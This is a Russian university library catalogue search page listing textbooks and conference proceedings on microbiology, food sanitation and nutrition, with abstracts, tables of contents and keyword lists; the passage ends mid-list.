Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

134 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МИКРОФЛОРА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 35
1. 
Мармузова Л. В. Основы микробиологии, санитарии и гигиены в пищевой промышленности [Текст] : учеб. для учреждений нач. проф. образования / Л. В. Мармузова, 2004. - 132 с.
2. 
Микробиология, гигиена и санитария в торговле [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования и уч-ся учеб. заведений нач. проф. образования / Автор-сост. Т. П. Трушина, 2000. - 315,[1] с.
3. 
Основы микробиологии, физиологии питания и санитарии для общепита [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт. сост. Т. П. Трушина, 2000. - 382 с.
Ключевые слова 
БАКТЕРИЯ -- ГРИБЫ плесневые -- ДРОЖЖИ -- ВИРУС -- Фаги -- МИКРООРГАНИЗМ -- Брожение -- ФИЗИОЛОГИЯ питания -- МИКРОФЛОРА -- Пищеварение -- Белки -- Жиры -- Углеводы -- Витамины -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- Обмен веществ -- Режим питания -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ пожилых людей -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ студентов -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА общественного питания -- ПРАВИЛА САНИТАРНЫЕ в общепите -- НАДЗОР санитарно-пищевой
4. 
Мармузова Л. В. Основы микробиологии, санитарии и гигиены в пищевой промышленности [Текст] : Учеб. / Л. В. Мармузова, 2000. - 132 с.
Держатели документа (Информация об экземплярах) 
5. 
Мудрецова-Висс К. А. Микробиология, санитария и гигиена [Текст] : учеб. для студ. вузов / К. А. Мудрецова-Висс, А. А. Кудряшова, В. П. Дедюхина, 2009. - 399 с.
Держатели документа (Информация об экземплярах) 
6. 
Мармузова, Людмила Викторовна. Основы микробиологии, санитарии и гигиены в пищевой промышленности : учебник для начального профессионального образования : учебное пособие для среднего профессионального образования / Л. В. Мармузова, 2000. - 136 с.
Держатели документа (Информация об экземплярах) 
7. 
Опыт советской медицины в Великой Отечественной войне 1941-1945 гг. [Текст]Т. 34. / гл. ред. Е. И. Смирнов, 1952. - 544 с.
Держатели документа (Информация об экземплярах) 
8. 
Современное состояние и перспективы развития индустрии питания и гостеприимства. В 2 т. Т. 2 [Текст] / ред. А. И. Барановский, 2012. - 187 с.
Ключевые слова 
Оглавление 
  • Заблицева, М. А. Характеристика овощного сырья, используемого в производстве йогуртов / М. А. Заблицева, И. А. Долматова. - с.4-8
    Кл. слова: ЙОГУРТ
  • Завгородняя, Л. М. Разработка и оптимизация рецептуры молочного десерта для школьного питания / Л. М. Завгородняя. - с.8-9
    Кл. слова: ДЕСЕРТ МОЛОЧНЫЙ, ПИТАНИЕ ШКОЛЬНИКОВ
  • Загидуллин, Д. З. Влияние материала оборудования на окисление аскорбиновой кислоты / Д. З. Загидуллин, В. Ю. Кирсанов, Ф. Ф. Фазлыев. - с.9-12
    Кл. слова: ОКИСЛЕНИЕ, КИСЛОТА АСКОРБИНОВАЯ
  • Иванова, Л. П. Спорт и здоровье: функциональный продукты специального назначения / Л. П. Иванова, Л. В. Егорова, С. В. Чехунов. - с.13-18
    Кл. слова: СПОРТ - ЗДОРОВЬЕ
  • Ивкова, И. Д. Использование растительных жиров в современных пищевых производствах / И. Д. Ивкова, А. С. Пиляева. - с.18-21
    Кл. слова: ПРОИЗВОДСТВО ПИЩЕВОЕ, ЖИР РАСТИТЕЛЬНЫЙ
  • Ивченко, В. В. Сравнительная характеристика качества кофе натурального растворимого разных производителей / В. В. Ивченко, О. В. Бессонова. - с.22-24
    Кл. слова: КОФЕ
  • Калауденова, А. Т. Изучение потребительских предпочтений и экспертиза качества оливкого масла / А. Т. Калауденова. - с.25-32
    Кл. слова: МАСЛО ОЛИВКОВОЕ
  • Кирсанов, В. Ю. Изучение влияния УФ-излучения на микрофлору предприятий общественного питания на примере дрожжей SACCHAROMYCES CEREVISIAE / В. Ю. Кирсанов, С. Е. Шаталов, Д. З. Загидуллин. - с.32-34
    Кл. слова: УФ - ИЗЛУЧЕНИЯ, МИКРОФЛОРА, ДРОЖЖИ
  • Ковальчук, О. Г. Соблюдение водного режима в марафонском беге / О. Г. Ковальчук, П. А. Скрипников. - с.34-38
    Кл. слова: БЕГ МАРАФОНСКИЙ, РЕЖИМ ПИТЬЕВОЙ, ПИТЬЁ СПОРТИВНОЕ
  • Колчина, В. А. Обогащение творога фруктовыми наполнителями / В. А. Колчина, И. А. Долматова, Т. Н. Зайцева. - с.38-42
    Кл. слова: ПРОДУКТ ТВОРОЖНЫЙ, ТВОРОГ
  • Кольман, О. Я. Инновационные технологии производства мучных кондитерских изделий, обогащенных ягодным порошком / О. Я. Кольман, Г. В. Иванова, Е. О. Никулина. - с.42-45
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ, НАПОЛНИТЕЛЬ ЯГОДНЫЙ
  • Кольман, О. Я. Современные индустриальные технологии в производстве кондитерских изделий на ягодной основе / О. Я. Кольман, Г. В. Иванова, Е. О. Никулина. - с.46-49
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ, НАПОЛНИТЕЛЬ ЯГОДНЫЙ
  • Корнева, О. С. Статистический анализ стабильности производства пива / О. С. Корнева. - с.49-53
    Кл. слова: ПИВО - ПРОИЗВОДСТВО
  • Корнева, О. С. Управление качеством пива на стадии формирования рынка / О. С. Корнева. - с.54-57
    Кл. слова: ПИВО
  • Коротаева, Т. А. Возможность использования фиников в производстве мучных кондитерских изделий / Т. А. Коротаева. - с.57-58
    Кл. слова: ФИНИКИ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Костюченко, Н. В. Влияние электромагнитной обработки на микроорганизмы / Н. В. Костюченко. - с.59-61
    Кл. слова: ОБРАБОТКА ЭЛЕКТРОМАГНИТНАЯ, МИКРООРГАНИЗМЫ
  • Костенко, Л. Н. Исследование качества чая черного байхового различных производителей / Л. Н. Костенко, О. В. Бессонова. - с.62-64
    Кл. слова: ЧАЙ
  • Кошкин, П. Ю. Перспективы использования пенообразных масс в молочной промышленности / П. Ю. Кошкин. - с.64-67
    Кл. слова: МАССА ПЕНООБРАЗНАЯ, ПРОМЫШЛЕННОСТЬ МОЛОЧНАЯ
  • Крылова, Л. В. Рекомендации в питании спортсменам-любителям / Л. В. Крылова, В. Н. Понкратов. - с.67-70
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
  • Методика оценки сбалансированности белкового состава многокомпонентных продуктов для школьного питания / ; П. А. Лисин, [и др.]. - с.70-77
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Проектирование поликомпонентных пищевых продуктов с заданным составом и свойствами / ; П. А. Лисин, [и др.]. - с.77-85
    Кл. слова: ПРОДУКТЫ ПИЩЕВЫЕ ПОЛИКОМПОНЕНТНЫЕ
  • Локотченко, Н. С. Проблемы и перспективы разработки низколактозных молочных коктейлей и пенообразующими свойствами / Н. С. Локотченко. - с.85-88
    Кл. слова: КОКТЕЙЛЬ МОЛОЧНЫЙ
  • Лопатинская, Т. В. Продукты питания функционального назначения для детей дошкольного возраста / Т. В. Лопатинская, Д. А. Чистякова, О. Я. Соколова. - с.89-92
    Кл. слова: ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Лузан, В. Н. Проектирование продукта на основе рыбного сырья нутриентно-адекватного питанию детей дошкольного возраста / В. Н. Лузан, Л. А. Ключникова, Б. Ш. Цыренжапов. - с.92-99
    Кл. слова: РЫБА - ПИТАНИЕ, ПИТАНИЕ ДОШКОЛЬНИКОВ
  • Лукьянюк, Н. В. Современные индустриальные технологии пищевых продуктов / Н. В. Лукьянюк. - с.99-102
    Кл. слова: ЧАЙ
  • Малкова, Н. К. Расширение ассортимента мучных кондитерских изделий повышенной пищевой ценности для сетевого питания / Н. К. Малкова, Л. Г. Ермош. - с.102-105
    Кл. слова: АССОРТИМЕНТ КОНДИТЕРСКИХ ИЗДЕЛИЙ
  • Мусифуллина, Э. В. Яблочные чипсы сублимационной сушки / Э. В. Мусифуллина, Н. В. Макарова, А. Н. Дмитриева. - с.105-109
    Кл. слова: ЧИПСЫ ЯБЛОЧНЫЕ, СУШКА СУБЛИМАЦИОННАЯ
  • Никифорова, Л. М. Заменители мяса, используемые для получения новых видов мясных продуктов / Л. М. Никифорова, О. В. Бессонова. - с.109-112
    Кл. слова: ЗАМЕНИТЕЛЬ МЯСА
  • Паленков, И. А. Разработка системы управления безопасностью и качеством слабоалкогольной газированной продукции / И. А. Паленков, О. В. Пасько. - с.112-120
    Кл. слова: АЛКОГОЛЬ, ПРОДУКЦИЯ СЛАБОАЛЬКОГОЛЬНАЯ
  • Петрова, Е. И. Перспектива расширения ассортимента молочных продуктов для питания спортсменов / Е. И. Петрова. - с.121-124
    Кл. слова: ПИТАНИЕ СПОРТСМЕНОВ
  • Портнягина, В. А. Производство функциональных продуктов для геродиетического питания / В. А. Портнягина. - с.124-126
    Кл. слова: ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ
  • Пушмина, И. Н. Формирование подходов к разработке функциональных молокосодержащих продуктов с использованием природных цеолитов / И. Н. Пушмина, А. В. Бауэр. - с.127-128
    Кл. слова: ЦЕОЛИТ ПРИРОДНЫЙ, ПРОДУКЦИЯ МОЛОКОСОДЕРЖАЩАЯ
  • Романишина, Е. Р. Исследование показателей качества и безопасности мясосодержаших полуфабрикатов / Е. Р. Романишина. - с.129-134
    Кл. слова: ПОЛУФАБРИКАТЫ МЯСНЫЕ
  • Савинцева, Ю. О. Современные индустриальные технологии пищевых продуктов на ОАО "Омская макаронная фабрика" / Ю. О. Савинцева. - с.134-141
    Кл. слова: ИЗДЕЛИЯ МАКАРОННЫЕ, ФАБРИКА МАКАРОННАЯ
  • Сапожников, А. Н. Влияние обработки пшеничной муки энергией инфракрасного излучения на сохраняемость хлеба / А. Н. Сапожников, Л. П. Шорникова, С. К. Волончук. - с.141-145
    Кл. слова: МУКА ПШЕНИЧНАЯ, ХЛЕБ
  • Смирнова, Н. А. Разработка стандарта организации "Биопродукт творожный" / Н. А. Смирнова. - с.146-149
    Кл. слова: БИОПРОДУКТ ТВОРОЖНЫЙ
  • Струпан, Е. А. Технология продуктов переработки дикорастущего сырья / Е. А. Струпан, В. С. Колодязная, О. А. Струпан. - с.149-155
    Кл. слова: СЫРЬЕ ДИКОРАСТУЩЕЕ
  • Трофимов, И. Е. Продукты на основе натурального – основа питания спортсмена / И. Е. Трофимов. - с.156-157
    Кл. слова: СЫРЬЕ НАТУРАЛЬНОЕ, ПИТАНИЕ СПОРТСМЕНОВ
  • Троценко, В. В. Повреждение семян зерновых культур при послеуборочной обработке / В. В. Троценко, А. И. Забудский. - с.158-162
    Кл. слова: ЗЕРНО, ГРЕЧИХА
  • Турлубаева, А. Н. Экология и пища / А. Н. Турлубаева, О. Я. Соколова. - с.162-165
    Кл. слова: ПИЩА - ЭКОЛОГИЯ
  • Унжакова, К. С. Медико-биологические аспекты создания продукции геродиетического питания / К. С. Унжакова, М. В. Исаева, О. Я. Соколова. - с.165-168
    Кл. слова: ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ
  • Четвертаков, А. А. Расширение ассортимента продукции за счет использования нетрадиционных видов йодосодержащего растительного сырья / А. А. Четвертаков, Г. В. Иванова, С. В. Чехунов. - с.168-171
    Кл. слова: СЫРЬЕ РАСТИТЕЛЬНОЕ ЙОДОСОДЕРЖАЩЕЕ, АССОРТИМЕНТ ПРОДУКЦИИ
  • Чехомова, Е. А. Товароведная оценка сладко-сливочного масла "Крестьянское" / Е. А. Чехомова, И. А. Ивкова. - с.172-174
    Кл. слова: МАСЛО КОРОВЬЕ
  • Щербина, М. О. Сравнительная характеристика качества варенья различных производителей / М. О. Щербина, Е. П. Галкова. - с.175-177
    Кл. слова: ВАРЕНЬЕ
  • Ходырева, Е. И. Проблемы формирования кластеров общественного питания / Е. И. Ходырева. - с.178-184
    Кл. слова: КЛАСТЕР, ПИТАНИЕ ОБЩЕСТВЕННОЕ
Держатели документа (Информация об экземплярах) 
9. 
Рубина, Елена Александровна. Микробиология, физиология питания, санитария [Текст] : учеб. пособие для студентов сред. проф. образования / Е. А. Рубина, В. Ф. Малыгина, 2012. - 238, [1] с.
Держатели документа (Информация об экземплярах) 

В учебнике изложены основы микробиологии, а также новые научные и нормативные данные в области физиологии питания и санитарии. Освещены современные представления о рациональном питании, о физиологических потребностях человека в пищевых веществах и энергии, о диетическом и лечебно-профилактическом питании. Рассмотрены вопросы профилактики кишечных инфекций и пищевых отравлений, санитарно-гигиенические требования к условиям производства, хранения, реализации, к качеству и безопасности продукции общественного питания.

10. 
Мармузова Л. В. Основы микробиологии, санитарии и гигиены в пищевой промышленности [Текст] : Учеб. / Л. В. Мармузова, 2001. - 132 с.
Держатели документа (Информация об экземплярах) 
11. 
Динамика систем, механизмов и машин [Текст] : материалы VIII Междунар. науч.-техн. конф. (Омск, 13-15 нояб. 2012 г.) : в 5 кн. / ОмГТУ [и др.]. Кн. V / редкол.: А. В. Косых [и др.] ; дар. В. В. Шалай, 2012. - 364 с.
Ключевые слова 
ОМПИ -- ОМГТУ -- СБОРНИК -- КОМПРЕССОР -- ПРОТИВОТАНКОВАЯ -- УПРАВЛЯЕМАЯ -- РАКЕТА -- МОЩНОСТЬ -- ДВИГАТЕЛЬ -- ТАНКОВОЕ -- ВООРУЖЕНИЕ -- ТОЧНОСТЬ -- РЕЗЬБОВОЕ -- СОЕДИНЕНИЕ -- ДИАГНОСТИРОВАНИЕ -- ПОЖАРНОЕ -- ОБОРУДОВАНИЕ -- ТАНК -- АВАРИЙНАЯ -- СИГНАЛИЗАЦИЯ -- ЭЛЕКТРОННЫЙ -- КОДОВЫЙ -- ЗАМОК -- МНОГОЦЕЛЕВАЯ -- ГУСЕНИЧНАЯ -- КОЛЕСНАЯ -- МАШИНА -- ВОЕННОЕ -- ОБРАЗОВАНИЕ -- БЕЗОПАСНОСТЬ -- РОССИЯ -- МУЛЬТИМЕДИА -- НАНОТЕХНОЛОГИЯ -- ПРЕДПРИНИМАТЕЛЬСТВО -- ЭТИКА -- ИННОВАЦИЯ -- ИНОСТРАННЫЙ -- ВОЕННОСЛУЖАЩИЙ -- БИОТЕХНОЛОГИЯ -- НОВОРОЖДЕННЫЙ -- ПОЛИОРГАННАЯ -- НЕДОСТАТОЧНОСТЬ -- БИОПРОДУКТЫ -- ГЕРОНТОЛОГИЧЕСКОЕ -- ПИТАНИЕ -- БИФИДОБАКТЕРИЯ -- ДОЛГОЛЕТИЕ -- ПОЖИЛОЙ -- АНТИСТРЕССОВОЕ -- МОЛОЧНЫЙ -- ШКОЛЬНИК -- ПЕРЕПЕЛ -- КУРЫ -- ТРИПТОФАН -- БИОНИКА -- НАНОМЕДИЦИНА -- КОРОВА -- МАСТИТ -- СЫВОРОТКА -- КРОЛИКОВОДСТВО -- КОРМОВАЯ -- ДОБАВКА -- МЕД -- ДИАСТАЗНОЕ -- ЧИСЛО -- КОЛБАСА -- МЯСНЫЕ -- КОНСЕРВЫ -- ЛИЗИН -- ФЕРМЕНТ -- БАД -- МИКРОФЛОРА -- ЖКТ -- НИР -- НАЧАЛЬНИК -- ТОМСКАЯ -- ГУБЕРНИЯ -- БИБЛИОТЕКА -- МАТЕРИАЛЬНОЕ -- ОБЕСПЕЧЕНИЕ -- АСОЦИАЛЬНОЕ -- ПОВЕДЕНИЕ -- ПОЛИТЕХНИК -- СТУДЕНЧЕСКИЙ -- СТРОИТЕЛЬНЫЙ -- ОТРЯД -- ГУМАНИТАРНОЕ -- ОБРАЗОВАНИЕ -- ЮЗАБИЛИТИ -- КОМПЬЮТЕРНАЯ -- ИГРА -- ДЕТИ -- КАШИРОВАНИЕ -- УПАКОВОЧНЫЙ -- МАТЕРИАЛ -- ЦВЕТОВОСПРОИЗВЕДЕНИЕ -- ИНТЕРЬЕР -- ТОЛЕРАНТНОСТЬ -- ВЫРАЗИТЕЛЬНОСТЬ -- ГРАФИКА -- АРХИТЕКТОНИКА -- ДИЗАЙН -- ТИПОГРАФИКА -- СТАЙЛИНГ -- ПЛАКАТ -- США -- РЕКЛАМА -- МАРКЕТИНГ -- ИНТЕРНЕТ-МАГАЗИН -- КОНТЕНТ -- КОРЕЯ -- ДАТСКИЙ -- ГРАФИЧЕСКИЙ -- ДЕРЕВЯННОЕ -- ЗОДЧЕСТВО -- КОММУНИКАЦИЯ -- ТРАФАРЕТНАЯ -- ПЕЧАТЬ
Оглавление 
Держатели документа (Информация об экземплярах) 

В сборнике рассмотрены актуальные вопросы динамических расчетов в различных отраслях знаний: при проектировании машин и механизмов, электроэнергетических и электромеханических систем, информационных и измерительных процессов, испытаний и контроля, тепловых и газодинамических процессов, конструкций летательных аппаратов, технологических процессов, трибосистем, а также вопросы математического моделирования в динамике, биомеханике и социальных системах.

Полный текст
12. 
Санитарная микробиология и вирусология [Текст] : учеб. пособие для вузов по специальности "Ветеринария" и направлению подгот. "Ветеринарно-санитарная экспертиза" / Н. М. Колычев [и др.] ; под ред. Н. М. Колычева, 2009. - 295 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены задачи санитарной микробиологии в части повышения качества пищевых продуктов. Показано значение санитарной микробиологии и вирусологии в общей профилактической работе по охране здоровья населения.

Описаны микрофлора объектов внешней среды, санитарно-показательные микроорганизмы, свойства возбудителей зооантропонозов, пищевых токсикозов и токсикоинфекций. Показана роль микроорганизмов в процессе формирования и изменения качества пищевых продуктов и возникновения ряда заболеваний, вызываемых патогенными и условно патогенными видами. Рассмотрены возбудители пороков пищевых продуктов.

Даны основы промышленной гигиены и санитарии на предприятиях пищевой промышленности, санитарной вирусологии, а также организации микробиологического контроля производства.

13. 
Низкоинтенсивные СВЧ-технологии(проблемы и реализации) [Текст] / Г. А. Морозов, О. Г. Морозов, Ю. Е. Седельников и др.; Под ред. Г. А. Морозова, Ю. Е. Седельникова, 2003. - 112 с.
Держатели документа (Информация об экземплярах) 
14. 
Цуранов, Олег Алексеевич. Холодильная техника и технология [Текст] : Учеб. для вузов по торговым специальностям / О. А. Цуранов, А. Г. Крысин, 2004. - 446 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- ПИЩЕВОЙ -- ПРОДУКТ -- МИКРОФЛОРА -- ОХЛАЖДЕНИЕ -- ЗАМОРАЖИВАНИЕ -- РАЗМОРАЖИВАНИЕ -- ИСКУССТВЕННЫЙ -- ХОЛОД -- ВИХРЕВОЙ -- ЭФФЕКТ -- ПЕЛЬТЬЕ -- ДЖОУЛЬ -- ТОМСОН -- ДЕСОРБЦИЯ -- КАРНО -- ХЛАДАГЕНТ -- ХЛАДОНОСИТЕЛЬ -- КОМПРЕССОР -- ТЕПЛООБМЕННЫЙ АППАРАТ -- КОНДЕНСАТОР -- РЕСИВЕР -- ВЕНТИЛЬ -- ФИЛЬТР -- АВТОМАТИЗАЦИЯ -- САМОРЕГУЛИРОВАНИЕ -- ОБОРУДОВАНИЕ -- ХОЛОДИЛЬНИК -- ЛЬДОГЕНЕРАТОР -- УТИЛИЗАЦИЯ -- ТЕПЛОТА -- КОНДИЦИОНИРОВАНИЕ -- ВОЗДУХ -- КОНДИЦИОНЕР -- ФРИЗЕР

Учебник состоит из 2 разделов, содержащих научную и практическую информацию из области холодильной технологии и холодильной техники. Представлен материал, касающийся специализированного торгового холодильного оборудования -фризеров мягкого мороженого, льдогенераторов, аппаратов для охлаждения и замораживания продуктов, приведены сведения о кондиционировании воздуха на предприятиях общественного питания и торговли, рассмотрены основные типы холодильного транспорта, требования к эксплуатации холодильного оборудования

15. 
Никитина , Елена Владимировна. Микробиология [Текст] : учеб. для вузов по специальности 260501 (271200) "Технология продуктов общественного питания" направления подгот. дипломир. специалиста 260500 (655700) "Технология продовольственных продуктов специального назначения и общественного питания" / Е. В. Никитина , С. Н. Киямова, О. А. Решетник, 2009. - 360, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник написан в соответствии с действующей программой дисциплины "Микробиология". Представлены основные разделы общей микробиологии: классификация, строение бактериальной клетки, особенности роста и физиологии микроорганизмов, рассмотрены биотехнологические аспекты использования микроорганизмов, их роль в получении продуктов питания, а также влияние микроорганизмов на свойства пищевых продуктов.

16. 
Исследования сетей и сооружений систем водоснабжения и канализации [Текст] : межвуз. темат. сб. тр. / Ленингр. инженер.-строит. ин-т, 1978. - 162, [1] с.
17. 
Мудрецова-Висс, Клавдия Алексеевна. Микробиология, санитария и гигиена [Текст] : Учебник гриф-МО / К. А. Мудрецова-Висс, В. П. Дедюхина, 2010. - 400 с.

Учебник состоит из трех взаимосвязанных частей: основы общей микробиологии (гл. 1-3); микробиология, санитария пищевых продуктов (гл.4-7) и основы гигиены и санитарии в торговле (гл. 8).

Приведены современные данные о морфологии и физиологии микроорганизмов, биохимических процессах, вызываемых ими, а также рассмотрено влияние экологических факторов на микрофлору, развивающуюся в продуктах питания при транспортировании, хранении, реализации и переработке сырья. Показана роль микроорганизмов в процессе формирования и изменения качества пищевых продуктов и возникновения ряда заболеваний, вызываемых патогенными и условно-патогенными видами. Применительно к профилю специальности изложены микробиологические процессы, приводящие к понижению качества и потерям ценности пищевых продуктов. Рекомендованы пути, способы и мероприятия, позволяющие предотвратить эти процессы или значительно уменьшить их. Рассмотрены основные санитарно-эпидемиологические требования к предприятиям торговли и обороту в них продовольственного сырья и пищевых продуктов.

Предназначен для студентов высших учебных заведений, аспирантов, преподавателей и практических работников.

18. 
Путь в науку - шаг к успеху [Текст] : материалы II Междунар. науч.-техн. конф. школьников (Омск, 2-3 мая 2012 г.) : в 2 кн. / ОмГТУ. Кн. 1 / отв. В. Ф. Ковалевский, 2012. - 478 с.
Ключевые слова 
ОМПИ -- ОМГТУ -- КОНФЕРЕНЦИЯ -- ШКОЛЬНИК -- БИОЛОГИЯ -- БИОСТИМУЛЯТОР -- ЧЕРЕНКОВАНИЕ -- РОСТ -- РАЗВИТИЕ -- КОМНАТНОЕ -- РАСТЕНИЕ -- ПРЕПОДАВАНИЕ -- ФОРМИРОВАНИЕ -- ПОЛИКУЛЬТУРНАЯ -- ЛИЧНОСТЬ -- ГЕМАТОЛОГИЯ -- СОСУДИСТОЕ -- ИНВЕНТАРИЗАЦИЯ -- ШКОЛЬНАЯ -- ТЕРРИТОРИЯ -- РАСТИТЕЛЬНАЯ -- АКВАРЕЛЬНАЯ -- КРАСКА -- ВИД -- ДВУСТВОРЧАТЫЙ -- МОЛЛЮСК -- ВИТЕБСКАЯ -- ОБЛАСТЬ -- ПРОДУКТ -- ГЕННО-МОДИФИЦИРОВАННЫЙ -- ГЕННЫЙ -- МОДИФИЦИРОВАННЫЙ -- СТРУКТУРА -- ВЫСЫХАЮЩАЯ -- КАПЛЯ -- КОЛЛОИД -- АЛЬБУМИН -- РАДИАЦИЯ -- ЛЕЧЕНИЕ -- ЛЕКАРСТВЕННОЕ -- РАСТЕНИЕ -- ФИТОНЦИД -- МИКРОФЛОРА -- ВОЗДУХ -- ПОМЕЩЕНИЕ -- КЛОНИРОВАНИЕ -- ТЕРАТОЛОГИЯ -- ЗОЖ -- ЗДОРОВЬЕ -- ЗДОРОВЫЙ ОБРАЗ ЖИЗНИ -- КОКШЕТАУ -- ВИТАМИННЫЙ -- СОСТАВ -- ЯБЛОКО -- СОК -- ФОРЕЛЕВОЕ -- ОЗЕРО -- ИРИДОДИАГНОСТИКА -- ЯНТАРНАЯ -- КИСЛОТА -- ВЛИЯНИЕ -- СЕМЕНА -- ВСХОЖЕСТЬ -- НАРКОТИК -- КОФЕИНОСОДЕРЖАЩИЙ -- НАПИТОК -- ПОДРОСТОК -- КАРАГАНДА -- ВЕЛОСИПЕД -- ВЕЛОДВИЖЕНИЕ -- УЧАЩИЙСЯ -- ЖИЗНЕННАЯ -- ЕМКОСТЬ -- ЛЕГКОЕ -- ЧЕЛОВЕК -- ПСИХИКА -- КОМПЬЮТЕР -- КУРЕНИЕ -- МАТЕМАТИКА -- СТРАНА -- ЗАЩИТНИК -- ХОЛОДНАЯ -- ВОДА -- ОБЛИВАНИЕ -- АКТИВНОСТЬ -- ЩИТОВИДНАЯ -- ЖЕЛЕЗА -- ГИПОФИЗ -- РЕПРОДУКТИВНОЕ -- ТАБАКОКУРЕНИЕ -- ВРЕД -- ДОЛГОЛЕТИЕ -- ПИТАНИЕ -- ПИЩЕВАЯ -- ДОБАВКА -- ЗУБНАЯ -- ПАСТА -- ФИЗИЧЕСКОЕ -- УПРАЖНЕНИЕ -- ВОЗРАСТ -- БИОЛОГИЧЕСКИЙ -- ИОН -- ВОДОРОДНЫЙ -- ТЕМПЕРАТУРА -- ИНФОРМАТИКА -- ВЫЧИСЛИТЕЛЬНАЯ -- ТЕХНИКА -- ИНФОРМАЦИЯ -- ЗАЩИТА -- ИГРОВАЯ -- ПРОГРАММА -- MINECRAFT -- ПРОГРАММА -- ОБРАБОТКА -- АУДИОФАЙЛ -- УЧЕБНАЯ -- МОДЕЛЬ -- ЦИФРО-АНАЛОГОВЫЙ -- ЦИФРОВОЙ -- АНАЛОГОВЫЙ -- ПРЕОБРАЗОВАТЕЛЬ -- БИБЛИОТЕКАРЬ -- АРМ -- АВТОМАТИЗИРОВАННОЕ -- МЕСТО -- РАБОЧЕЕ -- ТЕСТ -- ОБЩЕНИЕ -- МАСТЕРСТВО -- РЕДАКТИРОВАНИЕ -- ИЗОБРАЖЕНИЕ -- САЙТ-ИГРА -- ИГРА -- МОЙ ЛЮБИМЫЙ ТЕАТР -- JQUERY -- JARUS -- АНТИВИРУСНАЯ -- ШАНС - ИНФО -- ГРАФИЧЕСКИЙ -- РЕДАКТОР -- ADOBE PHOTOSHOP -- ИСТОРИЯ -- РОССИЯ -- ВОВ -- ВЕЛИКАЯ ОТЕЧЕСТВЕННАЯ ВОЙНА -- ПАТРИОТИЗМ -- ЭЛЕКТРОННАЯ -- БАЗА -- ВЕТЕРАН -- ТРУЖЕНИК -- ТЫЛ -- СТЕПНОГОРСК -- КАЗАХСТАН -- СИБИРЬ -- СИБИРЯК -- СССР -- НАГРАДА -- НАГРАДНАЯ -- СИСТЕМА -- ВОСПОМИНАНИЕ -- ПОДВИГ -- ГЕРОЙ -- КАРАГАНДА -- МАТЕМАТИК -- ПОБЕДА -- АКСАКОВ -- АКСАКОВО -- АБДИРОВ -- СЕМЬЯ -- ОЦЕНКА -- ОТЕЧЕСТВЕННАЯ ВОЙНА 1812 Г. -- ЖЕНЩИНА -- КОНТРУДАР -- ЛЕПЕЛЬСКИЙ -- СОВРЕМЕННАЯ -- ПРОЗА -- ПРАДЕД -- ГОРДОСТЬ -- АКМОЛИНСКАЯ -- СИМБИРСКОЕ -- ОПОЛЧЕНИЕ -- ВОРОНЦОВ -- КАРАГАНДИНСКАЯ -- СОВЕТСКИЙ -- НАРОД -- СЕВЕРНЫЙ -- ФЛОТ -- ЮНГА -- МОСКВА -- ПОЖАР -- ДЕТИ -- РЕБЕНОК -- ЭКОЛОГИЯ -- САЛАТ -- НАКОПЛЯЕМОСТЬ -- СОЛЬ -- ТЯЖЕЛЫЙ -- МЕТАЛЛ -- СНЕГ -- СНЕЖНЫЙ -- ПОКРОВ -- ЗАГРЯЗНЕНИЕ -- МУСОР -- HOMO SAPIENS -- ЛИШАЙНИК -- ЧИСТЫЙ -- ВОЗДУХ -- ИНДИКАТОР -- УЛЬЯНОВСК -- АТМОСФЕРНЫЙ -- БИОИНДИКАЦИЯ -- ХВОЯ -- СОСНА -- БЛАГОУСТРОЙСТВО -- ДЕТСКАЯ -- ПЛОЩАДКА -- ШКОЛА -- ВОЗДУШНАЯ -- СРЕДА -- ЭКОНОМИЯ -- ЭНЕРГОРЕСУРС -- СВИЯГА -- ЭКОЛОГИЧЕСКИЙ -- МОНИТОРИНГ -- ФРЕОН -- РАЗРУШАЮЩИЙ -- ВОДА -- ОЧИСТКА -- ЭНЕРГОСБЕРЕЖЕНИЕ -- КАЛИЙНОЕ -- УДОБРЕНИЕ -- АВТОМОБИЛЬ -- ОКРУЖАЮЩАЯ -- ФИЗИКА -- ТРУБОПРОВОД -- ТЕПЛОВОЙ -- НЕРАЗРУШАЮЩИЙ -- КОНТРОЛЬ -- МИКРОМИР -- ФРАКТАЛЬНАЯ -- МОДЕЛЬ -- НАУЧНОЕ -- ОТКРЫТИЕ -- ОПТИКА -- ОБЪЕМНОЕ -- ВОСПРИЯТИЕ -- ПЛОСКОЕ -- ИЗОБРАЖЕНИЕ -- ДИФФУЗИЯ -- ПРОТЕКАНИЕ -- СКОРОСТЬ -- ВЕЩЕСТВО -- ЖИДКОЕ -- ГАЗООБРАЗНОЕ -- РЕАКТИВНЫЙ -- ДВИГАТЕЛЬ -- ПРИБОР -- ПОЛУПРОВОДНИКОВЫЙ -- ЭНЕРГЕТИКА -- АЛЬТЕРНАТИВНАЯ -- ПТФЭ -- НАНОТРУБКА -- ЦВЕТ -- СВЕТ -- ДВИГАТЕЛЬНАЯ -- УСТАНОВКА -- ДВИЖЕНИЕ -- БРОУНОВСКОЕ -- АСТЕРОИД -- РАЗМЕР -- ЭЛЕМЕНТАРНАЯ -- ЧАСТИЦА -- ДАВЛЕНИЕ -- ЭЛЕКТРИЧЕСТВО -- КОЭФФИЦИЕНТ -- 